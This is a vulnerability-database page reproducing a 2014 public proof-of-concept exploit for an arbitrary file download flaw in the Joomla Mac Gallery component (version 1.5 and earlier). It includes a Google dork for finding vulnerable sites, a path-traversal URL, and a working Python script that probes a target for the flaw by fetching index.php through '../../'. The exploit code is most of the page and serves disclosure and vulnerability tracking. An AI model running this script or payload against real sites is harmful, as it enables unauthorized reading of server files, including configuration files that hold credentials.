Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Joomla Mac Gallery 1.5 - Arbitrary File Download

🗓️ 29 Sep 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 30 Views

Joomla Mac Gallery 1.5 Arbitrary File Download by Claudio Viviani from 2014-09-17 with PoC exploi

Code

                                                ######################
 
# Exploit Title : Joomla Mac Gallery <= 1.5 Arbitrary File Download
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : https://www.apptha.com
 
# Software Link : https://www.apptha.com/downloadable/download/sample/sample_id/18
 
# Dork Google: inurl:option=com_macgallery
 
# Date : 2014-09-17
 
# Tested on : Windows 7 / Mozilla Firefox
 
#             Linux / Mozilla Firefox
 
# Info:
 
# Joomla Mac Gallery suffers from Arbitrary File Download vulnerability
 
# PoC Exploit:
 
#http://localhost/index.php?option=com_macgallery&view=download&albumid=[../../filename]
 
#"album_id" variable is not sanitized.
 
######################
 
#!/usr/bin/env python
 
# http connection
import urllib, urllib2
# Args management
import optparse
# Error managemen
import sys
 
banner = """
   __                      __           ___ ___
  |__.-----.-----.--------|  .---.-.   |   Y   .---.-.----.
  |  |  _  |  _  |        |  |  _  |   |.      |  _  |  __|
  |  |_____|_____|__|__|__|__|___._|   |. \_/  |___._|____|
 |___|                                 |:  |   |
                                       |::.|:. |
                                       `--- ---'
  _______       __ __                      _____    _______
 |   _   .---.-|  |  .-----.----.--.--.   | _   |  |   _   |
 |.  |___|  _  |  |  |  -__|   _|  |  |   |.|   |__|   1___|
 |.  |   |___._|__|__|_____|__| |___  |   `-|.  |__|____   |
 |:  1   |                      |_____|     |:  |  |:  1   |
 |::.. . |                                  |::.|  |::.. . |
 `-------'                                  `---'  `-------'
 
                            j00ml4 M4c G4ll3ry <= 1.5 4rb1tr4ry F1l3 D0wnl04d
 
                        Written by:
 
                      Claudio Viviani
 
                   http://www.homelab.it
 
                      [email protected]
                  [email protected]
 
             https://www.facebook.com/homelabit
                https://twitter.com/homelabit
             https://plus.google.com/+HomelabIt1/
   https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
 
# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    else:
        return url
 
def connection(url,pathtrav):
    try:
        response = urllib2.urlopen(url+'/index.php?option=com_macgallery&view=download&albumid='+pathtrav+'index.php')
        content = response.read()
        if content != "":
            print '[!] VULNERABLE'
            print '[+] '+url+'/index.php?option=com_macgallery&view=download&albumid='+pathtrav+'index.php'
        else:
            print '[X] Not Vulnerable'
    except urllib2.HTTPError:
        print '[X] HTTP Error'
    except urllib2.URLError:
        print '[X] Connection Error'
 
commandList = optparse.OptionParser('usage: %prog -t URL')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
options, remainder = commandList.parse_args()
 
# Check args
if not options.target:
    print(banner)
    commandList.print_help()
    sys.exit(1)
 
print(banner)
 
url = checkurl(options.target)
pathtrav = "../../"
 
connection(url,pathtrav)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Sep 2014 00:00Current
7.1High risk
Vulners AI Score7.1
joomla mac galleryarbitrary file downloadclaudio vivianivendor homepagesoftware linkexploit titlevulnerabilitypoc exploithttp connectionwindows 7linuxmozilla firefoxdork googletested oninfo2014-09-17windowslinuxmozillafirefoxerror managementargs managementpythonhttpurlconnectionvulnerable.
30